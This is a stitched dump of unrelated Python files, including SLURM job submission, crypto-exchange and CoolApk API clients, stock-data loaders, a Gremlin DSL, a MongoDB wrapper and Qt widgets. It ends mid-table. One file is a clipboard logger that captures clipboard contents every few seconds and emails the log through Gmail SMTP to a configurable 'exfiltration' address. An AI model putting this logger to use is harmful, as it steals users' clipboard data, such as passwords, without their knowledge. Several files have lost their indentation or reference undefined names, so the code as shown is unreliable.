def setStates(self, states):
self.states = states
def setInitialState(self, initialState):
self.initialState = initialState
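# A minimal usage sketch (an assumption for illustration: 'automaton.txt' follows the
# expected format of one final-states line followed by "from letter to" transition lines):
if __name__ == '__main__':
    graph = Graph(open('automaton.txt'))
    graph.parse()  # parse() also closes the file
    print(graph.getAlphabet())
    print(graph.getInitialState(), graph.getFinalStates())
    for node in graph.gettransitions():
        print(graph.nodeToString(node))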
|
from subprocess import Popen, PIPE
import sys, time
import getpass
username = getpass.getuser()
#from Axel Schmidt
def file_len(f):
for i, l in enumerate(f):
pass
return i + 1
for i in range(0, 1):
command= """#!/bin/bash
#SBATCH --job-name=clas12-nflow{0}
#SBATCH --nodes=1
#SBATCH --ntasks=1
#SBATCH --cpus-per-task=1
#SBATCH --gres=gpu:1
#SBATCH --mem=4G
#SBATCH --time=04:00:00
#SBATCH --nodelist=node235
#SBATCH --partition=sched_mit_hill
#SBATCH --error=/pool001/{1}/clas12-nflows/slurm/logs/log_{0}.err
#SBATCH --output=/pool001/{1}/clas12-nflows/slurm/logs/log_{0}.out
#SBATCH --mail-user={1}@mit.edu
#SBATCH --mail-type=ALL
eval "$(conda shell.bash hook)"
conda activate torch-env
python train_nflow.py
""".format(str(i), username)
queue=Popen(args=["squeue","-u",username],stdin=None,stdout=PIPE)
linecount = file_len(queue.stdout)-1
print("There are ", linecount, "jobs on the queue.")
# If we have too many things on the queue, then wait a minute
while (linecount > 499):
print("There are still", linecount, "jobs on the queue. Waiting...")
sys.stdout.flush()
time.sleep(60)
queue=Popen(args=["squeue","-u",username],stdin=None,stdout=PIPE)
        linecount = file_len(queue.stdout) - 1
p=Popen(args=["sbatch"],stdin=PIPE);
p.communicate(bytes(command, encoding='utf-8'))
|
import logging
import os
import uuid
from cryptoxlib.CryptoXLib import CryptoXLib
from cryptoxlib.Pair import Pair
from cryptoxlib.clients.hitbtc.HitbtcWebsocket import TickerSubscription, OrderbookSubscription, TradesSubscription, \
AccountSubscription, ClientWebsocketHandle, CreateOrderMessage, CancelOrderMessage
from cryptoxlib.clients.hitbtc import enums
from cryptoxlib.version_conversions import async_run
LOG = logging.getLogger("cryptoxlib")
LOG.setLevel(logging.DEBUG)
LOG.addHandler(logging.StreamHandler())
print(f"Available loggers: {[name for name in logging.root.manager.loggerDict]}\n")
async def order_book_update(response: dict) -> None:
print(f"Callback order_book_update: [{response}]")
async def ticker_update(response: dict) -> None:
print(f"Callback ticker_update: [{response}]")
async def trade_update(response: dict) -> None:
print(f"Callback trade_update: [{response}]")
async def account_update(response: dict, websocket: ClientWebsocketHandle) -> None:
print(f"Callback account_update: [{response}]")
# as soon as account channel subscription is confirmed, fire testing orders
if 'id' in response and 'result' in response and response['result'] == True:
await websocket.send(CreateOrderMessage(
pair = Pair('ETH', 'BTC'),
type = enums.OrderType.LIMIT,
side = enums.OrderSide.BUY,
amount = "1000000000",
price = "0.000001",
client_id = str(uuid.uuid4())[:32]
))
await websocket.send(CancelOrderMessage(
client_id = "client_id"
))
async def run():
api_key = os.environ['HITBTCAPIKEY']
sec_key = os.environ['HITBTCSECKEY']
client = CryptoXLib.create_hitbtc_client(api_key, sec_key)
# Bundle several subscriptions into a single websocket
client.compose_subscriptions([
AccountSubscription(callbacks = [account_update]),
OrderbookSubscription(pair = Pair("ETH", "BTC"), callbacks = [order_book_update]),
TickerSubscription(pair = Pair("BTC", "USD"), callbacks = [ticker_update])
])
    # Bundle other subscriptions into a separate websocket
client.compose_subscriptions([
        TradesSubscription(pair = Pair("ETH", "BTC"), limit = 5, callbacks = [trade_update])
])
# Execute all websockets asynchronously
await client.start_websockets()
if __name__ == "__main__":
async_run(run())
|
import base64
import json
import urllib.request
from _md5 import md5
api = "https://api.coolapk.com/v6/main/init"
built_in_str = "ldTM3cTZiFTMhFzMlFWN2cjMjVDNzQWYxYTOwU2MwIDZHljcadFN2wUe5omYyATdZJTO2J2RGdXY5VDdZhlSypFWRZXW6l1MadVWx8EVRpnT6dGMaRUQ14keVdnWH5UbZ1WS61EVBlXTHl1dZdVSvcDZzI2YmVWMjF2NwAjZkN2YmVTY4UTO1YWO4Y2NwQGO"
device_id = "00000000-0000-0000-0000-000000000000"
package_name = "com.coolapk.market"
def base64_encode(data):
return base64.b64encode(data.encode()).decode()
def base64_decode(data):
return base64.b64decode(data.encode()).decode()
def reverse_str(s):
return s[::-1]
def md5_hex_digest(data):
m = md5()
m.update(data.encode())
return m.hexdigest()
def test_token(token: str):
opener = urllib.request.build_opener()
opener.addheaders.clear()
opener.addheaders.append(("User-Agent", "Dalvik/2.1.0 (Linux; U; Android 7.1.2; VirtualBox Build/N2G48H) (#Build; Android-x86; VirtualBox; android_x86-userdebug 7.1.2 N2G48H eng.cwhuan.20180502.160334 test-keys; 7.1.2) +CoolMarket/9.0.2"))
opener.addheaders.append(("X-Requested-With", "XMLHttpRequest"))
opener.addheaders.append(("X-Sdk-Int", "25"))
opener.addheaders.append(("X-Sdk-Locale", "zh-CN"))
opener.addheaders.append(("X-App-Id", "com.coolapk.market"))
opener.addheaders.append(("X-App-Version", "9.0.2"))
opener.addheaders.append(("X-App-Code", "1902151"))
opener.addheaders.append(("X-App-Version", "9"))
opener.addheaders.append(("X-App-Token", token))
response = opener.open(api).read().decode()
print(json.dumps(json.loads(response), indent=2, ensure_ascii=False))
|
# -*- coding: utf-8 -*-
import tushare as ts
from sqlalchemy import create_engine
from utilAll.Constants import *
from utilAll.FormatDate import *
import pandas as pd
class ReferenceInfo:
engine_sql = create_engine(SQL_ENG_NAME)
def setProfitData(self,year = None,topNo=50, isSave = False,tableName = REFERENCE_PROFIT_DATA):
[yearNow, quarter] = getYearQuarter(year, None)
df = ts.profit_data(year = yearNow,top=topNo)
if isSave is True:
df.to_sql(tableName, self.engine_sql, if_exists='append')
return df
def getProfitData(self,tableName = BASE_STOCK_BASICS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setForecastData(self,year=None,quarter=None, number = 1, isSave = False,tableName = REFERENCE_FORECAST_DATA):
[year, quarter] = getYearQuarter(year, quarter)
for i in range(0,number):
try:
df = ts.forecast_data(year, quarter)
df['date'] =str(year) + str(quarter)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
quarter = quarter - 1
if quarter < 1:
quarter = 4
year = year - 1
            except IOError as e:
                print(e)
def getForecastData(self, tableName = REFERENCE_FORECAST_DATA):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setXsgData(self,year=None,month=None, number = 1, isSave = False,tableName = REFERENCE_XSG_DATA):
[year, month] = getYearMonth(year, month)
for i in range(0,number):
try:
df = ts.xsg_data(year, month)
if month<10:
df['date'] =str(year) +'0'+ str(month)
else:
df['date'] = str(year) + str(month)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
month = month - 1
if month < 1:
month = 12
year = year - 1
            except IOError as e:
                print(e)
def getXsgData(self, tableName = REFERENCE_XSG_DATA):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setFundHoldings(self,year=None,quarter=None, number = 1, isSave = False,tableName = REFERENCE_HUND_HOLDINGS):
[year, quarter] = getYearQuarter(year, quarter)
for i in range(0,number):
try:
df = ts.fund_holdings(year, quarter)
df['date'] =str(year) + str(quarter)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
quarter = quarter - 1
if quarter < 1:
quarter = 4
year = year - 1
            except IOError as e:
                print(e)
def getFundHoldings(self, tableName = REFERENCE_HUND_HOLDINGS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setNewStocks(self, isSave = False,tableName = REFERENCE_NEW_STOCKS):
try:
df = ts.new_stocks()
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
        except IOError as e:
            print(e)
def getNewStocks(self, tableName = REFERENCE_NEW_STOCKS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setShMargins(self,endTime =None,number =1, isSave = False,tableName = REFERENCE_SH_MARGINS):
[startTime,endTime] = getStartTime(endTime = endTime, number=number)
try:
df = ts.sh_margins(startTime,endTime)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
        except IOError as e:
            print(e)
def getShMargins(self, tableName = REFERENCE_SH_MARGINS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setShMarginDetails(self,endTime =None,number =1, isSave = False,tableName = REFERENCE_SH_MARGINS_DETAILS):
[startTime,endTime] = getStartTime(endTime = endTime, number=number)
try:
df = ts.sh_margin_details(start = startTime,end = endTime)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
        except IOError as e:
            print(e)
def getShMarginDetails(self, tableName = REFERENCE_SH_MARGINS_DETAILS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setSzMargins(self,endTime =None,number =1, isSave = False,tableName = REFERENCE_SH_MARGINS):
[startTime,endTime] = getStartTime(endTime = endTime, number=number)
try:
df = ts.sz_margins(startTime,endTime)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
        except IOError as e:
            print(e)
def getSzMargins(self, tableName = REFERENCE_SH_MARGINS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setSzMarginDetails(self,endTime =None,startTime = None, isSave = False,tableName = REFERENCE_SH_MARGINS_DETAILS):
dateList = getdatelist(startTime,endTime)
dfAll = None
try:
for dateItem in dateList:
df = ts.sz_margin_details(dateItem)
if dfAll is None:
dfAll = df.copy()
else:
dfAll = dfAll.append(df)
            dfAll = dfAll.drop_duplicates()
            if isSave is True:
                dfAll.to_sql(tableName,self.engine_sql, if_exists='append')
        except IOError as e:
            print(e)
def getSzMarginDetails(self, tableName = REFERENCE_SH_MARGINS_DETAILS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def getAllReferenceInfo(self,year = None, isSave = False):
self.setProfitData(year=2016, topNo=5000, isSave=True)
self.setForecastData(year=2016, quarter=4, number=1, isSave=True)
self.setXsgData(year = 2017, month=12, number = 12, isSave = True)
self.setFundHoldings(year=2017, quarter=4, number=4, isSave=True)
self.setNewStocks(isSave = True)
self.setShMargins(endTime = '2017-12-25',number = 365, isSave = True)
self.setShMarginDetails(endTime = '2015-12-25',number = 365, isSave = True)
if __name__ == '__main__':
reference = ReferenceInfo()
    print(reference.setShMarginDetails(endTime = '2015-12-25',number = 365, isSave = True)) |
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from torchmeta.modules.module import MetaModule
from torchmeta.modules.linear import MetaLinear
class MetaMultiheadAttention(nn.MultiheadAttention, MetaModule):
__doc__ = nn.MultiheadAttention.__doc__
def __init__(self, *args, **kwargs):
super(MetaMultiheadAttention, self).__init__(*args, **kwargs)
factory_kwargs = {
'device': kwargs.get('device', None),
'dtype': kwargs.get('dtype', None)
}
bias = kwargs.get('bias', True)
self.out_proj = MetaLinear(self.embed_dim, self.embed_dim,
bias=bias, **factory_kwargs)
def forward(self, query, key, value, key_padding_mask=None,
need_weights=True, attn_mask=None, params=None):
if params is None:
params = OrderedDict(self.named_parameters())
in_proj_weight = params.get('in_proj_weight', None)
in_proj_bias = params.get('in_proj_bias', None)
out_proj_bias = params.get('out_proj.bias', None)
bias_k = params.get('bias_k', None)
bias_v = params.get('bias_v', None)
if not self._qkv_same_embed_dim:
attn_output, attn_output_weights = F.multi_head_attention_forward(
query, key, value, self.embed_dim, self.num_heads,
in_proj_weight, in_proj_bias,
bias_k, bias_v, self.add_zero_attn,
self.dropout, params['out_proj.weight'], out_proj_bias,
training=self.training,
key_padding_mask=key_padding_mask, need_weights=need_weights,
attn_mask=attn_mask, use_separate_proj_weight=True,
q_proj_weight=params['q_proj_weight'],
k_proj_weight=params['k_proj_weight'],
v_proj_weight=params['v_proj_weight'])
else:
attn_output, attn_output_weights = F.multi_head_attention_forward(
query, key, value, self.embed_dim, self.num_heads,
in_proj_weight, in_proj_bias,
bias_k, bias_v, self.add_zero_attn,
self.dropout, params['out_proj.weight'], out_proj_bias,
training=self.training,
key_padding_mask=key_padding_mask, need_weights=need_weights,
attn_mask=attn_mask)
if self.batch_first:
return attn_output.transpose(1, 0), attn_output_weights
else:
return attn_output, attn_output_weights
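# A minimal usage sketch (assumptions for illustration: torch >= 1.9 so that
# nn.MultiheadAttention has the `batch_first` attribute and nn.Linear accepts
# device/dtype kwargs; inputs use the default (seq_len, batch, embed_dim) layout):
if __name__ == '__main__':
    import torch
    attention = MetaMultiheadAttention(embed_dim=16, num_heads=4)
    query = key = value = torch.randn(5, 2, 16)
    params = OrderedDict(attention.named_parameters())
    output, weights = attention(query, key, value, params=params)
    print(output.shape, weights.shape)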
|
import math
def lcm(a, b):
return int(a * b / math.gcd(a, b))
ans = 1
for d in range(10, 20):
ans = lcm(ans, d + 1)
print(ans)
# Copyright Junipyr. All rights reserved.
# https://github.com/Junipyr |
"""
Abstract Functor
A functor is an operator defined on a type, consisting of a mapping of objects
and a mapping of morphisms,
i.e. it contains a Transform type and a Morphism type
"""
from typing import TypeVar, Generic
__all__ = ["AbstractFunctor"]
from ..type import AbstractType
from ._operator import AbstractOperator
from .core.transform import AbstractTransform
from .core.morphism import AbstractMorphism
C = TypeVar("C", bound=AbstractType)
# [TODO] need to do the class getitem trick
"""
this is known as AbstractFunctor[C, D]
makes sense as the functor category / functor type.
"""
class AbstractFunctor(
AbstractOperator,
):
transforms: set[AbstractTransform[C, D]]
morphisms: set[AbstractMorphism[C]] # one morphism for every AbstractMorphism[C]
|
__version__ = "2.0+master"
|
"""Gremlin DSL for the Security Graph Altimeter Universe."""
from datetime import datetime
import uuid
from gremlin_python.process.graph_traversal import (
GraphTraversal,
GraphTraversalSource,
__ as AnonymousTraversal,
)
from gremlin_python.process.traversal import (
T,
Cardinality,
Bytecode,
)
class AltimeterTraversal(GraphTraversal):
"""Graph Traversal for the Altimeter Universe."""
def link_to_universe(self, universe):
"""Creates an edge from the vertices in the traversal to the current
universe vertex."""
return self \
.sideEffect(
__.addE('universe_of')
.from_(__.V().is_universe_obj(universe))
)
def is_universe(self):
"""Filters the vertices that are Universes."""
return self \
.hasLabel('Universe')
def is_universe_obj(self, universe):
"""Filters the Universe vertex with a given version and
namespace."""
return self \
.is_universe() \
.has('namespace', universe.namespace) \
.has('version', universe.version.int_version)
def linked_universe(self):
"""Returns the ``Universe`` associated with a vertex."""
return self \
.inE() \
.is_universe_of() \
.outV()
def is_linked_to_universe(self, universe):
"""Returns the ``Universe`` vertex associated with a vertex only if it
matches the specified universe."""
return self \
.linked_universe() \
.is_universe_obj(universe)
def is_universe_of(self):
"""Filters edges of type ``universe_of``."""
return self.hasLabel('universe_of')
class __(AnonymousTraversal):
"""Anonymous Traversal for the Altimeter Universe."""
graph_traversal = AltimeterTraversal
@classmethod
def link_to_universe(cls, *args):
"""Creates an edge from the vertices in the transversal to the current
universe vertex."""
return cls.graph_traversal(
None, None, Bytecode()).link_to_universe(*args)
@classmethod
def is_universe(cls, *args):
"""Filters the vertices that are Altimeter Universes."""
return cls.graph_traversal(
None, None, Bytecode()).is_universe(*args)
@classmethod
def is_universe_obj(cls, *args):
"""Filters the Altimeter Universe with a given version and
namespace."""
return cls.graph_traversal(
            None, None, Bytecode()).is_universe_obj(*args)
@classmethod
def is_linked_to_universe(cls, *args):
"""Returns the ``Universe`` vertex associated with a vertex only if it
matches the specified universe."""
return cls.graph_traversal(
None, None, Bytecode()).is_linked_to_universe(*args)
@classmethod
def is_universe_of(cls):
"""Filters edges of type ``universe_of``."""
return cls.graph_traversal(
None, None, Bytecode()).is_universe_of()
class AltimeterTraversalSource(GraphTraversalSource):
"""Graph Traversal Source for the Altimeter Universe."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.graph_traversal = AltimeterTraversal
def ensure_universe(self, universe):
"""Creates a new Altimeter ``Universe`` vertex, if it doesn't
exist, and returns its id."""
return self \
.V() \
.is_universe_obj(universe) \
.fold() \
.coalesce(
# The universe vertex already exists.
__.unfold()
.elementMap(),
# The universe vertex does not exist.
__.addV('Universe')
.property(T.id, str(uuid.uuid4()))
.property(
Cardinality.single,
'namespace',
universe.namespace
)
.property(
Cardinality.single,
'version',
universe.version.int_version
)
.elementMap(),
)
def linked_universe(self, vid):
"""Returns a ``Universe`` vertex associated with the vertex identified
by the vertex id ``vid``."""
ret = self \
.V(vid) \
.linked_universe()
return ret
def universe(self, universe):
"""Returns the ``Universe`` vertex that corresponds to specified
universe."""
return self\
.V() \
.is_universe_obj(universe)
def link_to_universe(self, universe, vid):
"""Links a given ``Universe`` to the specified vertex"""
return self\
.V(vid) \
.link_to_universe(universe)
def add_snapshot(self, vid, universe):
"""Creates a new Snapshot vertex with the given vid, links it to the
given universe and returns the newly created vertex."""
return self \
.addV('altimeter_snapshot') \
.property(T.id, vid) \
.property(Cardinality.single, 'timestamp', datetime.now()) \
.link_to_universe(universe)
|
from core import art
from core.files import FileHandler
import random
import shutil
import json
import sys
import os
class InfoHandler:
def __init__(self, data_filepath, metadata_filepath):
self.data_filepath = data_filepath
self.metadata_filepath = metadata_filepath
# copy each file to the export directory
# change their names to prevent merge conflicts
# we can assume that the directories exist, as they were created by the group merger
# this can be asynchronous, as nothing depends on it
def export_pair(self, index, export_directory):
# get the files out of the filepaths
_, data_file = os.path.split(self.data_filepath)
_, metadata_file = os.path.split(self.metadata_filepath)
# get the extension for the data file
_, extension = os.path.splitext(data_file)
# create the export filepaths (use the indexes, as we do not want export conflicts or overwrites)
export_data_filepath = f"{export_directory}/{art.FILE_FOLDER}/{index}{extension}"
export_metadata_filepath = f"{export_directory}/{art.METADATA_FOLDER}/{index}"
# move each file
shutil.copy(self.data_filepath, export_data_filepath)
shutil.copy(self.metadata_filepath, export_metadata_filepath)
return export_data_filepath, export_metadata_filepath
# create a class to merge groups of information
class GroupMerger(FileHandler):
def __init__(self, export_directory, directories):
self.directories = directories
self.export_directory = export_directory
# get all the files from each directory --> put them in info handlers
self.info_handlers = []
for directory in directories:
# get the directory extension
extension = self.get_directory_extension(directory)
# if there is no extension, quit and signal such
if not extension:
print(f"No extensions could be found in {directory}")
sys.exit()
# get the file pairs
self.info_handlers.extend(self.get_file_pairs(
directory, extension))
# make sure the export directory Exists
self.check_export_directory()
# function to get the file pairs
def get_file_pairs(self, directory, extension):
# store the pairs
pairs = []
# get the files
files = os.listdir(f"{directory}/{art.METADATA_FOLDER}")
# check if the pairs exist for everything in metadata
for file in files:
pair = self.get_file_pair(directory, file, extension)
# if there is a pair
if pair:
pairs.append(pair)
else:
print(f"No file found corresponding to metadata file: {file}")
return pairs
# function to check if a file pair exists
def get_file_pair(self, directory, file, extension):
data_file = f"{directory}/{art.FILE_FOLDER}/{file}{extension}"
metadata_file = f"{directory}/{art.METADATA_FOLDER}/{file}"
if not os.path.isfile(data_file):
return None
if not os.path.isfile(metadata_file):
return None
else:
return InfoHandler(data_file, metadata_file)
# function to export all
# this SHOULD be multithreaded, but I haven't had the time to put it together yet, so it remains single-threaded
def export_all(self):
# shuffle the info handlers
random.shuffle(self.info_handlers)
# iterate over all the info handlers --> export pair
for i in range(len(self.info_handlers)):
# get the info handler --> have it export with the index to the export directory
new_data_file, new_metadata_file = self.info_handlers[i].export_pair(
i, self.export_directory)
# change the name in the metadata
self.rename(new_metadata_file)
# create a way to rename the citizens in order (just going to point to the wrong index after creation)
def rename(self, filepath):
# read the data
with open(filepath, 'r') as infile:
data = json.loads(infile.read())
# get the filename, which will correspond to the new name
_, new_name = os.path.split(filepath)
# change the name
prefix = data['name'].split('#')[0]
data['name'] = f"{prefix}#{new_name}"
# rewrite the file
with open(filepath, 'w') as outfile:
outfile.write(json.dumps(data, indent=4))
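# A minimal usage sketch (assumptions for illustration: "group_a" and "group_b" are
# existing collections laid out with the art.FILE_FOLDER / art.METADATA_FOLDER
# structure this module expects, and "export" is the merged output directory):
if __name__ == "__main__":
    merger = GroupMerger("export", ["group_a", "group_b"])
    merger.export_all()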
|
"""Nonstationary (linear trend) flood frequency analysis stan
"""
import os
import numpy as np
from . import StatisticalModel
from ..path import data_path
from ..util import compile_model
class LN2LinearTrend(StatisticalModel):
"""Lognormal Model with linear trend and constant CV
"""
def __init__(self, **kwargs) -> None:
self.model_file = os.path.abspath(os.path.join(data_path, "ln2-trend.stan"))
model_param: dict = {
"mu0_mean": kwargs.pop("mu0_mean", 10),
"mu0_sd": kwargs.pop("mu0_sd", 1),
"beta_mu_mean": kwargs.pop("beta_mu_mean", 0),
"beta_mu_sd": kwargs.pop("beta_mu_sd", 0.5),
"cv_logmean": kwargs.pop("cv_logmean", np.log(0.1)),
"cv_logsd": kwargs.pop("cv_logsd", 0.5),
"n_warmup": kwargs.pop("n_warmup", 1000),
"n_chain": kwargs.pop("n_chain", 1),
}
super().__init__(**kwargs)
self.param.update(model_param)
self.model_name = "LN2 Linear Trend"
def _calculate_one(self, data) -> np.ndarray:
stan_data = {"y": data, "N": self.N, "M": self.M}
for param in [
"mu0_mean",
"mu0_sd",
"beta_mu_mean",
"beta_mu_sd",
"cv_logmean",
"cv_logsd",
]:
stan_data.update({"{}".format(param): self.param.get(param)})
stan_mod = compile_model(
filename=self.model_file, model_name="LN2-Linear-Trend"
)
n_iter: int = self.param.get("n_mcsim") + self.param.get("n_warmup")
fit = stan_mod.sampling(
data=stan_data,
iter=n_iter,
chains=self.param.get("n_chain"),
warmup=self.param.get("n_warmup"),
)
fit_dict = fit.extract(permuted=True)
return fit_dict["yhat"]
|
import csv
def remove(string_input):
return "".join(string_input.split())
def best_value(cvs_file): #returns the best value in a dataset
    with open(cvs_file, 'r') as file:
        reader = file.readlines()
    last_row = remove(reader[-1])
    c = 0
    final = ""
    for i in last_row:
        if i == ",": c += 1
        if c == 2:
            final = final + i
        if c == 3: break
    return final[1:]
def candidate_value(x): #returns the candidate value in a dataset
    row = remove(x)
    c = 0
    final = ""
    for i in row:
        if i == ",": c += 1
        if c == 1:
            final = final + i
        if c == 2: break
    return final[1:]
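# A minimal usage sketch (an assumption for illustration: the data file from
# best_value()'s original hard-coded path exists; best_value() returns the third
# comma-separated field of the last row, candidate_value() the second field of a row):
if __name__ == "__main__":
    print(best_value("data/second_testing_set.csv"))
    print(candidate_value("12,0.873,0.901"))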
|
#!/usr/bin/python
import sys,pymongo
from pymongo import Connection
from pymongo.errors import ConnectionFailure
from bson.code import Code
class MongoDB:
'''Manage database layer for Mongodb'''
def __init__(self,db_name):
# print "MongoDB constructor"
self.db_name = db_name
self.db_host = 'localhost'
def insertBulk(self,docs,table_name):
"insert a list of events map"
try:
connection = Connection(host=self.db_host, port=27017)
        except ConnectionFailure as e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
db_handler[table_name].insert(docs, safe=True)
connection.end_request()
def count(self, table_name, query={}):
try:
connection = Connection(host=self.db_host, port=27017)
        except ConnectionFailure as e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
count = db_handler[table_name].find(query).count()
connection.end_request()
return count
def removeAll(self, table_name):
try:
connection = Connection(host=self.db_host, port=27017)
        except ConnectionFailure as e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
db_handler[table_name].remove()
connection.end_request()
def find(self, table_name, page_size, page_num, sort_field, sort_direction=pymongo.DESCENDING,query={}):
# name like '%m%' ==> db.users.find({"name": /.*m.*/}) db.collectionname.find({'files':{'$regex':'^File'}})
try:
connection = Connection(host=self.db_host, port=27017)
        except ConnectionFailure as e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
if page_num > 1:
events_doc = db_handler[table_name].find(query).sort([(sort_field,sort_direction)]).limit(page_size).skip(page_size * (page_num-1) )
else:
events_doc = db_handler[table_name].find(query).sort([(sort_field,sort_direction)]).limit(page_size)
connection.end_request()
# if event_count_doc:
# print "Successfully fetch document:" + str(event_count_doc["index"])
return events_doc
def countSize(self,table_name,query={}):
'''count download size group by source ip'''
try:
connection = Connection(host=self.db_host, port=27017)
        except ConnectionFailure as e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
key={"ip":True}
initial = {"size":0}
reducer = Code('function(doc, prev) {prev.size = prev.size + doc.size;}')
download_size_doc = db_handler[table_name].group(key,query,initial,reducer)
connection.end_request()
return download_size_doc
def get_user(self,user_name):
'''get users by name'''
try:
connection = Connection(host=self.db_host, port=27017)
        except ConnectionFailure as e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
users_doc = db_handler['users'].find({'username' : user_name})
connection.end_request()
return users_doc
def test():
db = MongoDB('esm')
num_of_events = db.count('events')
    print('num_of_events = ' + str(num_of_events))
if __name__ == "__main__":test()
|
#! Python
# To grab the clipboard.
import pyperclip
# Used to send emails every certain amount of time of the log.
import smtplib
# Threading Library.
import threading
log = ""
lastLogged = ""
count = 0
# Sends us the email of the log on the given interval.
def send_email(email, password, message):
# Initialize server for gmail
email_server = smtplib.SMTP("smtp.gmail.com", 587)
# Start server
email_server.starttls()
# Login for me
email_server.login(email, password)
# Send the log to yourself
email_server.sendmail(email, email, message)
# Quit
email_server.quit()
# We need to THREAD to send emails and retrieve info at the same time.
def thread_function():
global log
global count
global lastLogged
if count < 60:
if lastLogged != pyperclip.paste():
log += pyperclip.paste()
lastLogged = pyperclip.paste()
count += 1
timer_object = threading.Timer(5, thread_function)
timer_object.start()
else:
if lastLogged != pyperclip.paste():
log += pyperclip.paste()
lastLogged = pyperclip.paste()
# Change the first two values to whatever your desired exfiltration email is.
send_email("[email protected]", "yourpassword", log)
# Uncomment this line if you want a demo that prints to the command line instead of emailing yourself.
#print(log)
log = ""
count = 0
timer_object = threading.Timer(5, thread_function)
timer_object.start()
thread_function()
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2014, Andrew Wilson
# Copyright (c) 2012, Dorian Scholz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from python_qt_binding.QtWidgets import \
QButtonGroup, QCheckBox, QGroupBox, QLabel, QVBoxLayout
class CheckBoxGroup(QGroupBox):
"""
Creates a button group of non-exclusive checkbox options.
    Options must be a list of dicts with the following keys: 'enabled','title','description','tooltip'
"""
def __init__(self, options, title='Checkboxes', selected_indexes=[], parent=None):
super(CheckBoxGroup, self).__init__()
self.setTitle(title)
self.setLayout(QVBoxLayout())
self._button_group = QButtonGroup()
self._button_group.setExclusive(False)
self._options = options
if parent is None:
parent = self
for (button_id, option) in enumerate(self._options):
checkbox = QCheckBox(option.get('title', 'option %d' % button_id))
checkbox.setEnabled(option.get('enabled', True))
checkbox.setChecked(button_id in selected_indexes)
checkbox.setToolTip(option.get('tooltip', ''))
self._button_group.addButton(checkbox, button_id)
parent.layout().addWidget(checkbox)
if 'description' in option:
parent.layout().addWidget(QLabel(option['description']))
def get_settings(self):
"""Return dictionary with selected_indexes (array) and selected_options (array) keys."""
selected_indexes = []
selected_options = []
for button in self._button_group.buttons():
if button.isChecked():
selected_indexes.append(self._button_group.id(button))
selected_options.append(self._options[self._button_group.id(button)])
return {'selected_indexes': selected_indexes, 'selected_options': selected_options}
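# A minimal usage sketch (an assumption for illustration: a standalone QApplication
# is created here only so the checkbox group can be shown on its own):
if __name__ == '__main__':
    import sys
    from python_qt_binding.QtWidgets import QApplication
    app = QApplication(sys.argv)
    options = [
        {'title': 'Option A', 'tooltip': 'first choice'},
        {'title': 'Option B', 'description': 'second choice'},
    ]
    group = CheckBoxGroup(options, title='Demo options', selected_indexes=[0])
    group.show()
    print(group.get_settings())
    sys.exit(app.exec_())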
|
#!/usr/bin/python
#coding:utf8
import random
from sb import s, b
################################################################################
small_prime_table = (
0x0002, 0x0003, 0x0005, 0x0007, 0x000B, 0x000D, 0x0011, 0x0013,
0x0017, 0x001D, 0x001F, 0x0025, 0x0029, 0x002B, 0x002F, 0x0035,
0x003B, 0x003D, 0x0043, 0x0047, 0x0049, 0x004F, 0x0053, 0x0059,
0x0061, 0x0065, 0x0067, 0x006B, 0x006D, 0x0071, 0x007F, 0x0083,
